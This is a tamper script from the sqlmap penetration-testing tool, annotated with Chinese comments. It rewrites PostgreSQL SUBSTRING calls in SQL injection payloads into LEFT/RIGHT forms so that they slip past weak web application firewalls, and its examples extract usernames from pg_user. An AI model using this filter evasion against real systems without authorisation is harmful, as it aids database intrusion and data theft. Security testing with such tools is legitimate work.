#!/usr/bin/env python

"""
Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

import re

from lib.core.enums import PRIORITY

__priority__ = PRIORITY.NORMAL

def dependencies():
    pass

def tamper(payload, **kwargs):
    """
    Replaces PostgreSQL SUBSTRING with LEFT and RIGHT

    Tested against:
        * PostgreSQL 9.6.12

    Note:
        * Useful to bypass weak web application firewalls that filter SUBSTRING (but not LEFT and RIGHT)

    >>> tamper('SUBSTRING((SELECT usename FROM pg_user)::text FROM 1 FOR 1)')
    'LEFT((SELECT usename FROM pg_user)::text,1)'
    >>> tamper('SUBSTRING((SELECT usename FROM pg_user)::text FROM 3 FOR 1)')
    'LEFT(RIGHT((SELECT usename FROM pg_user)::text,-2),1)'
    """

    retVal = payload

    # 如果payload不为空
    if payload:
        # 在payload中查找SUBSTRING函数
        match = re.search(r"SUBSTRING\((.+?)\s+FROM[^)]+(\d+)[^)]+FOR[^)]+1\)", payload)

        # 如果找到了SUBSTRING函数
        if match:
            # 获取SUBSTRING函数中的位置参数
            pos = int(match.group(2))
            # 如果位置参数为1
            if pos == 1:
                # 将SUBSTRING函数替换为LEFT函数
                _ = "LEFT(%s,1)" % (match.group(1))
            # 否则
            else:
                # 将SUBSTRING函数替换为RIGHT和LEFT函数的组合
                _ = "LEFT(RIGHT(%s,%d),1)" % (match.group(1), 1 - pos)

            # 将替换后的函数替换回payload中
            retVal = retVal.replace(match.group(0), _)

    # 返回替换后的payload
    return retVal
